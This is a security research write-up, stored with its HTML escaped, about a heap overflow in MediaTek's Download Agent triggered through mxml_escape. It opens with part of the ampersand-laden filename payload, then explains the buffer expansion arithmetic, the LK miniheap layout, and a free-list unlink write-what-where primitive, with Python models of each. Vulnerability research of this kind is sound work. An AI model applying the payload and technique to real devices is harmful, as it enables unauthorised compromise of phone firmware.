;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;&amp;amp;lt;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;&amp;amp;gt;;&amp;amp;amp;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;&amp;amp;lt;;;;;;;;;;;&amp;amp;lt;;;;&amp;amp;quot;;;&amp;amp;lt;;;;;;;;;;;;;;;;&amp;amp;quot;&amp;amp;lt;;;;;;;;&amp;amp;gt;;;;;&amp;amp;lt;;;;;;;;;;;;;&amp;amp;gt;;;;&amp;amp;quot;;;&amp;amp;gt;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;&amp;amp;amp;;;;;&amp;amp;quot;;;;;;;&amp;amp;amp;&amp;amp;quot;;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;&amp;amp;lt;;&amp;amp;lt;;&amp;amp;gt;;;;;;;;;;&amp;amp;amp;;;;;&amp;amp;amp;;;&amp;amp;lt;&amp;amp;lt;&amp;amp;gt;&amp;amp;amp;;&amp;amp;gt;;;&amp;amp;lt;;;;;;;;;;;&amp;amp;quot;;&amp;amp;lt;;;;;&amp;amp;amp;;;;;;;;;;&amp;amp;amp;;;&amp;amp;lt;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;quot;;;;&amp;amp;amp;&amp;amp;lt;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;&amp;amp;lt;;;;;;&amp;amp;amp;;;;;;;;;&amp;amp;gt;;;&amp;amp;quot;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;&amp;amp;lt;;;;;;;;;&amp;amp;lt;;&amp;amp;gt;&amp;amp;quot;;;;;&amp;amp;amp;&amp;amp;amp;;;;;;;;;;&amp;amp;amp;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;&amp;amp;amp;;;&amp;amp;lt;;;&amp;amp;quot;;;;;&amp;amp;gt;;;&amp;amp;quot;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;&amp;amp;gt;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;&amp;amp;gt;&amp;amp;quot;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;&amp;amp;gt;&amp;amp;lt;;;;;;;;;;&amp;amp;amp;;;;;;;;&amp;amp;quot;;;;;;;&amp;amp;lt;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;&amp;amp;lt;;;;;;;;;;;;&amp;amp;amp;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;&amp;amp;quot;;&amp;amp;gt;;&amp;amp;amp;;;
;&amp;amp;quot;;;;;;;&amp;amp;lt;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;&amp;amp;quot;;&amp;amp;quot;;;;;;;;;;&amp;amp;gt;;&amp;amp;quot;;;&amp;amp;quot;&amp;amp;quot;&amp;amp;lt;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;&amp;amp;lt;;&amp;amp;quot;;;&amp;amp;gt;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;&amp;amp;amp;;;;;;;;;;&amp;amp;quot;;&amp;amp;lt;;;;;;;;;;;&amp;amp;gt;;;;;;&amp;amp;lt;;;;;;&amp;amp;amp;;;;;;&amp;amp;gt;;;;;&amp;amp;amp;;;;;;&amp;amp;amp;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;&amp;amp;gt;&amp;amp;lt;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;&amp;amp;lt;&amp;amp;amp;;;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;gt;;;;;;&amp;amp;amp;;;;;;;;;&amp;amp;gt;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;&amp;amp;gt;&amp;amp;quot;;;;;&amp;amp;amp;;;;;&amp;amp;amp;&amp;amp;quot;&amp;amp;quot;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;&amp;amp;amp;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;amp;;;;;;;;;&amp;amp;quot;&amp;amp;gt;;;;;;;;;;;&amp;amp;lt;&amp;amp;quot;;;;;;&amp;amp;lt;;;;;;;;;;;;&amp;amp;quot;&amp;amp;amp;;;&amp;amp;quot;&amp;amp;lt;;&amp;amp;quot;;&amp;amp;quot;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;&amp;amp;quot;;;;&amp;amp;amp;;;;&amp;amp;lt;;&amp;amp;quot;;;;;;;;;;;&amp;amp;lt;;;;&amp;amp;quot;;;;;;;;;;;;;;;&amp;amp;lt;&amp;amp;lt;&amp;amp;lt;;;;;;;&amp;amp;lt;;&amp;amp;quot;;;&amp;amp;amp;;;;;;;;&amp;amp;quot;&amp;amp;amp;;;&amp;amp;amp;;;;;;;&amp;amp;amp;;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;amp;;;&amp;amp;quot;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;&amp;amp;quot;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;&amp;
amp;lt;;;;;&amp;amp;quot;;;;;;;;;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;&amp;amp;amp;&amp;amp;quot;&amp;amp;amp;;&amp;amp;amp;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;&amp;amp;quot;;&amp;amp;amp;;&amp;amp;gt;;&amp;amp;gt;;;;;&amp;amp;amp;;;;&amp;amp;lt;;;;;;;;;;&amp;amp;amp;;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;&amp;amp;quot;&amp;amp;quot;;;;;;;;;&amp;amp;gt;;&amp;amp;lt;;;;;;;;;;;;&amp;amp;quot;;;&amp;amp;gt;&amp;amp;amp;;&amp;amp;lt;;;;;;&amp;amp;lt;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;&amp;amp;amp;;;&amp;amp;amp;;;;;;;&amp;amp;gt;;;&amp;amp;lt;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;&amp;amp;amp;&amp;amp;amp;;&amp;amp;amp;;;;;;;&amp;amp;amp;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;;;&amp;amp;amp;;;;;;&amp;amp;lt;;;;;;;;;&amp;amp;gt;;;&amp;amp;lt;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;&amp;amp;amp;;;;;;;;;;;&amp;amp;quot;;;;;;&amp;amp;quot;;;;;;&amp;amp;gt;;;;;&amp;amp;amp;;;;;;;;;;;;&amp;amp;amp;;&amp;amp;amp;;;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;lt;;;;;;;;&amp;amp;gt;;;;;;&amp;amp;quot;;;;&amp;amp;quot;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;&amp;amp;lt;;;&amp;amp;amp;&amp;amp;amp;&amp;amp;gt;;;;;;;&amp;amp;amp;;;;;;;;&amp;amp;quot;;;;;;;;;&amp;amp;gt;;;;;;;;;&amp;amp;quot;;&amp;amp;lt;;&amp;amp;amp;;;;&amp;amp;amp;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;&amp;amp;quot;;;;&amp;amp;quot;;;;;;;&amp;amp;gt;;&amp;amp;amp;;;;;&amp;amp;gt;&amp;amp;lt;;;;;&amp;amp;gt;;;;&amp;amp;amp;;;&amp;amp;quot;;;;;;;;;;;;;&amp;amp;quot;;;;;;;;;;;;;;;;;;;;;&amp;amp;amp;;;;;&amp;amp;gt;;;&amp;amp;amp;;&amp;amp;gt;;&amp;amp;gt;;;;&amp;amp;quot;;;;&amp;amp;amp;;;;;;;&amp;amp;quot;;;;;;;;;;&amp;amp;gt;;&amp;amp;gt;;&amp;amp;quot;;;;;;;;;;;;;;&amp;amp;amp;;;;;;&amp;amp;gt;&amp;amp;quot;;;;;;;;;;;&amp;amp;lt;;;;;&amp;amp;quot;;;;;;;&amp;amp;gt;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;&amp;amp;gt;;;;&amp;amp;gt;;;;;;;;;;&amp;amp;amp;;;;;&amp;amp;lt;;;;&amp;amp;quot;;;;;;;&amp;amp;gt;;;;;
;&amp;amp;lt;;;;;;;;;;;;;;;;;&amp;amp;gt;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;;;;;;&amp;amp;quot;&amp;amp;quot;;;;;;;;;&amp;amp;gt;;;;;;&amp;amp;gt;;&amp;amp;gt;;;&amp;amp;lt;;;;;;;;;;;;;;;;;;;;;;;;;;;&amp;amp;lt;;&amp;amp;gt;;;&amp;amp;amp;&amp;amp;amp;;;&amp;amp;gt;&amp;amp;lt;;;;
&amp;lt;/source_file&amp;gt;&amp;lt;/arg&amp;gt;&amp;lt;/da&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This quickly caught our attention, so we decided to check what the DA was doing with the name.&lt;/p&gt;
&lt;h2&gt;XML Expansion&lt;/h2&gt;
&lt;p&gt;As mentioned earlier, the AIO command invokes &lt;code&gt;fp_read_host_file&lt;/code&gt; to download the specified file from the host. But before initiating the transfer, the function calls &lt;code&gt;mxml_escape&lt;/code&gt; on the filename to sanitize it for XML:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;filename_len = strnlen(file_name, 0x200);
escaped_xml = mxml_escape(file_name, (uint32_t)filename_len);
bytes_read = snprintf((char *)(result + 0x40), XML_CMD_BUFF_LEN,
    &quot;&amp;lt;?xml version=\&quot;1.0\&quot; encoding=\&quot;utf-8\&quot;?&amp;gt;&amp;lt;host&amp;gt;...&quot;
    &quot;&amp;lt;source_file&amp;gt;%s&amp;lt;/source_file&amp;gt;...&amp;lt;/host&amp;gt;&quot;,
    error_msg, buf, escaped_xml, (ulong)package_Len);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is in &lt;code&gt;mxml_escape&lt;/code&gt;. It allocates a fixed 512-byte buffer (&lt;code&gt;0x200&lt;/code&gt;) and expands special XML characters without any bounds checking:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char *mxml_escape(char *src, uint32_t len)
{
  byte bVar1;
  char *pcVar2;
  byte *dest;
  byte *pbVar3;
  ulong uVar4;

  if ((_dest == (byte *)0x0) &amp;amp;&amp;amp;
      (_dest = (byte *)malloc(0x200), _dest == (byte *)0x0)) {
    return &quot;&quot;;
  }
  pcVar2 = (char *)_dest;
  memset(_dest, 0, 0x200);
  if (src == (char *)0x0) {
    pcVar2 = &quot;null&quot;;
  } else {
    pbVar3 = (byte *)pcVar2;
    if (len != 0) {
      uVar4 = (ulong)len;
      dest = (byte *)pcVar2;
      do {
        bVar1 = *src;
        if (bVar1 == 0x22) {
          memcpy(dest, &quot;&amp;amp;quot;&quot;, 6);  // &quot; -&amp;gt; 6 bytes
          pbVar3 = dest + 6;
        } else if (bVar1 == 0x26) {
          memcpy(dest, &quot;&amp;amp;amp;&quot;, 5);   // &amp;amp; -&amp;gt; 5 bytes
          pbVar3 = dest + 5;
        } else if (bVar1 == &apos;&amp;lt;&apos;) {
          // &amp;lt; -&amp;gt; 4 bytes (&amp;amp;lt;)
          pbVar3 = dest + 4;
        } else if (bVar1 == &apos;&amp;gt;&apos;) {
          // &amp;gt; -&amp;gt; 4 bytes (&amp;amp;gt;)
          pbVar3 = dest + 4;
        } else {
          *dest = bVar1;
          pbVar3 = dest + 1;
        }
        src = (char *)((byte *)src + 1);
        uVar4 = uVar4 - 1;
        dest = pbVar3;
      } while (uVar4 != 0);
    }
    *pbVar3 = 0;
  }
  return (char *)(byte *)pcVar2;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Character&lt;/th&gt;
&lt;th&gt;Expansion&lt;/th&gt;
&lt;th&gt;Size&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&quot;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;&amp;amp;quot;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;6 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;amp;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;&amp;amp;amp;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;5 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;lt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;&amp;amp;lt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;4 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;&amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;&amp;amp;gt;&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;4 bytes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;So if you send a filename containing 103 &lt;code&gt;&amp;amp;&lt;/code&gt; characters, &lt;code&gt;mxml_escape&lt;/code&gt; tries to write &lt;code&gt;103 * 5 = 515&lt;/code&gt; bytes into a 512-byte buffer. Classic heap overflow.&lt;/p&gt;
&lt;p&gt;The second AIO command Chimera sends uses exactly this technique: a filename stuffed with &lt;code&gt;&amp;amp;&lt;/code&gt; characters.&lt;/p&gt;
&lt;p&gt;We wrote a quick Python script to simulate the expansion and figure out how much they were overwriting:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Input size:    0x17ca (6090 bytes)
Capped size:   0x200 (512 bytes, capped by strnlen)
Expanded size: 0x2ac (684 bytes)
Buffer size:   0x200 (512 bytes)
Overflow:      0xac (172 bytes)

Special characters (in first 0x200 bytes):
  &apos;&amp;amp;&apos;: 43 occurrences (215 bytes expanded)
&lt;/code&gt;&lt;/pre&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Update (02/02/2026):&lt;/strong&gt; Corrected the overflow size: &lt;code&gt;strnlen&lt;/code&gt; caps the filename to 512 bytes before expansion, so the actual overflow is 172 bytes, not 7.5KB.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;That&apos;s a modest overflow: 172 bytes past the end of the buffer. The ~6KB filename Chimera sends is mostly theater. Only the first 512 bytes matter, and most of those are just &lt;code&gt;;&lt;/code&gt; characters that don&apos;t expand at all.&lt;/p&gt;
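&lt;p&gt;The arithmetic is easy to reproduce. The sketch below is not the script we used, just a minimal Python model of the same calculation; the names &lt;code&gt;expanded_size&lt;/code&gt; and &lt;code&gt;overflow&lt;/code&gt; are hypothetical, and the per-character sizes are taken from the table above.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;BUF_SIZE = 0x200   # fixed buffer allocated by mxml_escape
NAME_CAP = 0x200   # strnlen(file_name, 0x200) caps the input length

# output bytes per input byte, mirroring the branches in mxml_escape
EXPANSION = {0x22: 6, 0x26: 5, 0x3C: 4, 0x3E: 4}

def expanded_size(name):
    # strnlen stops at the first NUL byte or at the cap, whichever comes first
    nul = name.find(0)
    if nul != -1:
        name = name[:nul]
    return sum(EXPANSION.get(byte, 1) for byte in name[:NAME_CAP])

def overflow(name):
    # bytes written past the end of the buffer (terminating NUL not counted)
    return max(0, expanded_size(name) - BUF_SIZE)

print(overflow(bytes([0x26]) * 103))  # 3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Feeding it a name whose first 512 bytes contain 43 ampersands and otherwise only non-expanding bytes gives an expanded size of 684 and an overflow of 172, matching the numbers above.&lt;/p&gt;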
&lt;p&gt;&lt;strong&gt;But how exactly is this useful? What exactly is it overwriting?&lt;/strong&gt;&lt;/p&gt;
&lt;h2&gt;Understanding the Heap&lt;/h2&gt;
&lt;p&gt;To understand how to exploit this overflow, we first need to understand how the heap works in both DAs.&lt;/p&gt;
&lt;p&gt;MediaTek uses a simple heap implementation based on &lt;a href=&quot;https://github.com/littlekernel/lk/blob/master/lib/heap/miniheap/miniheap.c&quot;&gt;LK&apos;s (Little Kernel) miniheap&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Depending on the architecture, the DA uses slightly different implementations: &lt;code&gt;miniheap.c&lt;/code&gt; for ARM64 and &lt;code&gt;heap.c&lt;/code&gt; for ARM32. The core logic is mostly the same, but there are some differences in the metadata structures.&lt;/p&gt;
&lt;h3&gt;Initialization&lt;/h3&gt;
&lt;p&gt;One of the very first things DA2 does after booting is initialize its heap:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void init_heap(void)
{
    heap_init(0x4007f100, 0x32000000);
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;heap_init&lt;/code&gt; function sets up a global structure called &lt;code&gt;theheap&lt;/code&gt; that tracks the heap state:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// ARM64 variant (miniheap.c)
struct heap {
    void *base;                 // start of heap memory
    size_t len;                 // total heap size
    size_t remaining;           // bytes still available
    size_t low_watermark;       // lowest remaining value seen
    mutex_t lock;               // mutex for thread safety
    struct list_node free_list; // head of free chunk list
};
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;// ARM32 variant (heap.c)
struct heap {
    void *base;                 // start of heap memory
    size_t len;                 // total heap size
    struct list_node free_list; // head of free chunk list
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This structure lives in DA2&apos;s &lt;code&gt;.bss&lt;/code&gt; section, not on the heap itself. It holds references to where the heap starts, its size, and the head of the free list.&lt;/p&gt;
&lt;p&gt;In this case, the heap starts at &lt;code&gt;0x4007F100&lt;/code&gt; with a size of &lt;code&gt;0x32000000&lt;/code&gt; (800MB). The base address varies between devices, but the size has remained the same across all DAs we&apos;ve analyzed.&lt;/p&gt;
&lt;h3&gt;Heap Layout&lt;/h3&gt;
&lt;p&gt;The heap is divided into chunks laid out sequentially in memory. Each chunk can be either allocated or free, and they can appear in any order depending on the history of allocations and frees.&lt;/p&gt;
&lt;p&gt;Something like &lt;code&gt;ALLOC -&amp;gt; ALLOC -&amp;gt; FREE -&amp;gt; ALLOC&lt;/code&gt; is perfectly valid.&lt;/p&gt;
&lt;p&gt;Each chunk starts with a header, followed by the body (user data when allocated, unused space when free). The header format differs between chunk types.&lt;/p&gt;
&lt;h4&gt;Free Chunks&lt;/h4&gt;
&lt;p&gt;Free chunks are linked together in a doubly-linked list so the allocator can quickly find available memory. The list is sorted by address, with lower addresses appearing first:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct free_heap_chunk {
    struct list_node node;  // prev/next pointers (embedded struct)
    size_t len;             // total size of this chunk
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;list_node&lt;/code&gt; struct is embedded as the first member:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct list_node {
    struct list_node *prev;
    struct list_node *next;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since &lt;code&gt;list_node&lt;/code&gt; sits at offset 0, you can cast between &lt;code&gt;free_heap_chunk*&lt;/code&gt; and &lt;code&gt;list_node*&lt;/code&gt; freely.&lt;/p&gt;
&lt;h4&gt;Allocated Chunks&lt;/h4&gt;
&lt;p&gt;Allocated chunks are not linked together. They simply sit in memory with a header placed immediately before the user data:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct alloc_struct_begin {
    unsigned int magic;  // 0x68656170 (&apos;heap&apos;) / ONLY on ARM32
    void *ptr;           // pointer to the start of the chunk (header included)
    size_t size;         // total size of the chunk (header + user data)
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;ptr&lt;/code&gt; field points back to where the chunk actually starts in memory. This is needed because alignment requirements might add padding between the header and user data, so when freeing, the allocator needs to know where the chunk originally began.&lt;/p&gt;
&lt;p&gt;The most notable difference between architectures is that ARM32 allocations include a &lt;code&gt;magic&lt;/code&gt; field set to &lt;code&gt;0x68656170&lt;/code&gt; (&lt;code&gt;&apos;heap&apos;&lt;/code&gt;), while ARM64 does not (it&apos;s only included when &lt;code&gt;LK_DEBUGLEVEL &amp;gt; 1&lt;/code&gt;, which we&apos;ve never seen enabled in production DAs).&lt;/p&gt;
&lt;h3&gt;Allocation&lt;/h3&gt;
&lt;p&gt;When you call &lt;code&gt;malloc(size)&lt;/code&gt;, the heap:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Adds &lt;code&gt;sizeof(struct alloc_struct_begin)&lt;/code&gt; to the requested size&lt;/li&gt;
&lt;li&gt;Rounds up to pointer alignment&lt;/li&gt;
&lt;li&gt;Walks the free list from the head and uses the first chunk that fits (first-fit allocation)&lt;/li&gt;
&lt;li&gt;If the chunk is larger than needed, splits it: one part becomes allocated, the remainder stays free&lt;/li&gt;
&lt;li&gt;Stores the allocation metadata just before the returned pointer&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Since the free list is sorted by address, lower addresses tend to get allocated first, though this depends on the current fragmentation state.&lt;/p&gt;
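&lt;p&gt;The allocation steps can be sketched as a small Python model. This is an illustrative simplification, not the DA code: the free list is a plain address-sorted list of &lt;code&gt;(addr, length)&lt;/code&gt; tuples, &lt;code&gt;HEADER_SIZE&lt;/code&gt; assumes the 16-byte ARM64 header without a magic field, and the names &lt;code&gt;chunk_size&lt;/code&gt; and &lt;code&gt;heap_alloc&lt;/code&gt; are hypothetical. It always splits a larger chunk, whereas a real allocator may hand out the whole chunk when the remainder is too small to be tracked.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HEADER_SIZE = 16    # assumed: ptr + size on ARM64, no magic field
POINTER_SIZE = 8    # assumed: 64-bit pointers

def chunk_size(request):
    # add the header, then round up to pointer alignment
    total = request + HEADER_SIZE
    return (total + POINTER_SIZE - 1) // POINTER_SIZE * POINTER_SIZE

def heap_alloc(free_list, request):
    # free_list: address-sorted list of (addr, length) tuples, updated in place
    need = chunk_size(request)
    for index, (addr, length) in enumerate(free_list):
        if length &amp;lt; need:
            continue                      # too small, keep walking (first fit)
        if length == need:
            del free_list[index]          # exact fit: unlink the whole chunk
        else:
            free_list[index] = (addr + need, length - need)  # split the chunk
        return addr + HEADER_SIZE         # user pointer follows the header
    return None                           # no chunk was large enough

free_list = [(0x1000, 0x20), (0x2000, 0x1000)]
print(hex(heap_alloc(free_list, 0x200)))  # 0x2010
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Under these assumptions a &lt;code&gt;malloc(0x200)&lt;/code&gt; consumes &lt;code&gt;0x210&lt;/code&gt; bytes of heap, and the request skips the first free chunk because it is too small.&lt;/p&gt;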
&lt;h3&gt;Free&lt;/h3&gt;
&lt;p&gt;When you call &lt;code&gt;free(ptr)&lt;/code&gt;, the heap:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Reads the &lt;code&gt;alloc_struct_begin&lt;/code&gt; metadata before the pointer&lt;/li&gt;
&lt;li&gt;Creates a new free chunk from the allocation&lt;/li&gt;
&lt;li&gt;Inserts it back into the free list (sorted by address), merging with adjacent free chunks if possible&lt;/li&gt;
&lt;/ol&gt;
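&lt;p&gt;The free path can be modeled the same way. This is a rough Python sketch under the same assumptions (an address-sorted list of &lt;code&gt;(addr, length)&lt;/code&gt; tuples, hypothetical function name &lt;code&gt;heap_free&lt;/code&gt;). For brevity it re-scans the whole list to merge neighbours instead of only checking the chunks next to the inserted one, which gives the same result when the list was already fully merged.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import bisect

def heap_free(free_list, addr, length):
    # insert the released chunk at its address-sorted position
    bisect.insort(free_list, (addr, length))
    merged = []
    for start, size in free_list:
        # a chunk that begins exactly where the previous one ends is adjacent
        if merged and merged[-1][0] + merged[-1][1] == start:
            prev_start, prev_size = merged.pop()
            merged.append((prev_start, prev_size + size))
        else:
            merged.append((start, size))
    free_list[:] = merged

free_list = [(0x1000, 0x100), (0x1300, 0x100)]
heap_free(free_list, 0x1100, 0x200)
print([(hex(a), hex(n)) for a, n in free_list])  # [(&apos;0x1000&apos;, &apos;0x400&apos;)]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here the released chunk fills the gap between two free chunks, so all three collapse into a single free chunk.&lt;/p&gt;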
&lt;h3&gt;Exploiting the Free List&lt;/h3&gt;
&lt;p&gt;This same allocator has been the target of previous research. Quarkslab&apos;s &lt;a href=&quot;https://www.sstic.org/media/SSTIC2024/SSTIC-actes/when_vendor1_meets_vendor2_the_story_of_a_small_bu/SSTIC2024-Article-when_vendor1_meets_vendor2_the_story_of_a_small_bug_chain-rossi-bellom_neveu.pdf&quot;&gt;&quot;When Samsung meets MediaTek&quot;&lt;/a&gt; paper exploited a heap overflow in Samsung&apos;s bootloader by abusing the free list unlink operation, so we decided to look at the same primitive.&lt;/p&gt;
&lt;p&gt;When a chunk is removed from the free list during allocation, &lt;code&gt;list_delete&lt;/code&gt; performs a classic unlink:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;static inline void list_delete(struct list_node *item)
{
    item-&amp;gt;next-&amp;gt;prev = item-&amp;gt;prev;
    item-&amp;gt;prev-&amp;gt;next = item-&amp;gt;next;
    item-&amp;gt;prev = item-&amp;gt;next = 0;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If we can overflow into a free chunk and corrupt its &lt;code&gt;prev&lt;/code&gt;/&lt;code&gt;next&lt;/code&gt; pointers, we get a write-what-where primitive when that chunk gets unlinked. It&apos;s a classic technique, but still effective when there&apos;s no heap hardening.&lt;/p&gt;
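&lt;p&gt;To make the primitive concrete, here is a minimal Python model of the unlink, with memory represented as a dictionary from address to pointer-sized value. The addresses are hypothetical and chosen only for illustration, and the offsets assume 8-byte pointers.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PREV_OFFSET = 0   # offset of list_node.prev
NEXT_OFFSET = 8   # offset of list_node.next, assuming 8-byte pointers

def list_delete(memory, item):
    prev_ptr = memory[item + PREV_OFFSET]
    next_ptr = memory[item + NEXT_OFFSET]
    memory[next_ptr + PREV_OFFSET] = prev_ptr   # item-&amp;gt;next-&amp;gt;prev = item-&amp;gt;prev
    memory[prev_ptr + NEXT_OFFSET] = next_ptr   # item-&amp;gt;prev-&amp;gt;next = item-&amp;gt;next
    memory[item + PREV_OFFSET] = 0
    memory[item + NEXT_OFFSET] = 0

# hypothetical addresses, for illustration only
CHUNK, WHAT, WHERE = 0x5000, 0x40002000, 0x40001000

# free chunk whose prev/next pointers were replaced by the overflow
memory = {CHUNK + PREV_OFFSET: WHAT, CHUNK + NEXT_OFFSET: WHERE}
list_delete(memory, CHUNK)

print(hex(memory[WHERE]))               # 0x40002000
print(hex(memory[WHAT + NEXT_OFFSET]))  # 0x40001000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The value placed in &lt;code&gt;prev&lt;/code&gt; is written to the address placed in &lt;code&gt;next&lt;/code&gt;. The unlink also performs the mirrored write, storing &lt;code&gt;next&lt;/code&gt; at &lt;code&gt;prev + 8&lt;/code&gt;, so both values have to point at writable memory.&lt;/p&gt;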
&lt;h2&gt;Debugging the Heap&lt;/h2&gt;
&lt;p&gt;At this point, we understood the heap internals and had a potential overflow primitive. But to actually exploit it, we needed to know the exact heap state when the overflow happens: what&apos;s allocated, what&apos;s free, and where everything sits in memory.&lt;/p&gt;
&lt;p&gt;The Quarkslab researchers faced a similar challenge and solved it by dumping the heap and emulating it offline. We wanted to do the same, but there was a problem: we had no easy way to read memory from the device.&lt;/p&gt;
